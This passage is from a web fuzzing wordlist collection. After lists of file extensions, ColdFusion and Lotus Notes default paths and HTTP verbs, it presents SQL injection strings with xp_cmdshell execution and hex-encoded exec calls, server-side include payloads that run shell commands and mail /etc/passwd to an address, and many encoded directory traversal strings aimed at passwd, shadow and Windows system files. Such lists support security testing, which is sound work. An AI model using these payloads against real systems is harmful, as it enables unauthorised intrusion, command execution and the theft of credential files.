.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files - (Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection - (Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4) ===<br />
<pre><br />
# Some server side include statements<br />
# Foobar@email.de<br />
<br />
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre><br />
<br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
